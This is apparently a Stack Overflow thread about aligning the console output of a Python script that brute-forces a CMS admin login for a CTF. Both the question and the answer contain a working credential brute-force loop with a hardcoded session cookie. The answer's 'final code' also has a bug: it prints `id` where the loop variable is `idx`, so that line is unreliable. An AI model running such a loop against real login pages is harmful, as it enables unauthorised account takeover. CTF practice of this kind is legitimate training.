# How can print out in console more beautifully?

Tags: python, python-3.x

I create a Web-Bruteforce project with **Python** for CTFs. I ran it.

[image: My Project Outputs]

As you can see **something's wrong. It isn't regular.** How can I print them more beautifully? These are my codes:

```py
    try:
        try:
            import requests
        except:
            print("You have to install \"requests\" via pip")
     
        header={"Cookie":"CMSSESSIDd6a5f2400115=uvtv1n19gois72a76vn4flje7u"}
        username = open("username.txt","r")
        username_content = username.read()
        username.close()
     
        password = open("common10k.txt","r")
        password_content = password.read()
        password.close()
     
        id=0
     
        print("=====================================================================")
        print("ID       Username          Password          Status_Code       Length")
        print("=====================================================================")
     
        for u in username_content.splitlines():
            for p in password_content.splitlines():
                url = "http://10.10.255.177/simple/admin/login.php"
                data = {"username":f"{u}","password":f"{p}","submit":"Submit"}
                sonuc = requests.post(url=url,data=data,headers=header)
                id+=1
                print(f"{id}        {u}             {p}            {sonuc.status_code}             {len(sonuc.content)}")
     
    except KeyboardInterrupt:
        print("Exiting...")
```

(These IP addresses and the cookie were for a CTF)

Comment: Your data items are not all of the same length so the output is ragged. Add a length specification inside the `{ }` in your `print()` call. Look in the docs for *format specification mini-language*.

Comment: can you explain, what you mean by order ?

Comment: Does this answer your question? [Printing Lists as Tabular Data](https://stackoverflow.com/questions/9535954/printing-lists-as-tabular-data)

Answer (score 1, accepted):

You can specify a size for the formatting and the content will be padded with spaces

```
# header
print(f"{'ID':5s}{'Username':15s}{'Password':15s}{'Status_code':12s}{'Length':8s}")

count = 0

for u in username_content.splitlines():
    for p in password_content.splitlines():
        url = "http://10.10.255.177/simple/admin/login.php"
        data = {"username": f"{u}", "password": f"{p}", "submit": "Submit"}
        sonuc = requests.post(url=url, data=data, headers=header)
        count += 1
        print(f"{count:<5d}{u:15s}{p:15s}{sonuc.status_code:<12d}{len(sonuc.content):<8d}")
```

---

### More

- Do not use `id` builtin keyword
- Read file with a `with`, you don't need to think about closing it so

  ```
  with open("username.txt", "r") as username:
        username_content = username.read()
  ```
- Or read it with `pathlib`

  ```
  from pathlib import Path
  username_content = Path("username.txt").read_text()
  ```
- You can use `itertools.product` to use one `for-loop`

  ```
  for u, p in product(username_content.splitlines(), password_content.splitlines()):
  ```
- Use `enumerate` to get the `count` auto-generated

  ```
  for idx, (u, p) in enumerate(product(username_content.splitlines(), password_content.splitlines())):
  ```

---

Final code

```
try:
    try:
        import requests
        from pathlib import Path
        from itertools import product
    except:
        print("You have to install \"requests\" via pip")

    url = "http://10.10.255.177/simple/admin/login.php"
    header = {"Cookie": "CMSSESSIDd6a5f2400115=uvtv1n19gois72a76vn4flje7u"}
    username_content = Path("username.txt").read_text().splitlines()
    password_content = Path("common10k.txt").read_text().splitlines()

    print("=" * 70)
    print(f"{'ID':5s}{'Username':15s}{'Password':15s}{'Status_code':12s}{'Length':8s}")
    print("=" * 70)

    for idx, (u, p) in enumerate(product(username_content, password_content)):
        data = {"username": f"{u}", "password": f"{p}", "submit": "Submit"}
        sonuc = requests.post(url=url, data=data, headers=header)
        print(f"{id:<5d}{u:15s}{p:15s}{sonuc.status_code:<12d}{len(sonuc.content):<8d}")

except KeyboardInterrupt:
    print("Exiting...")
```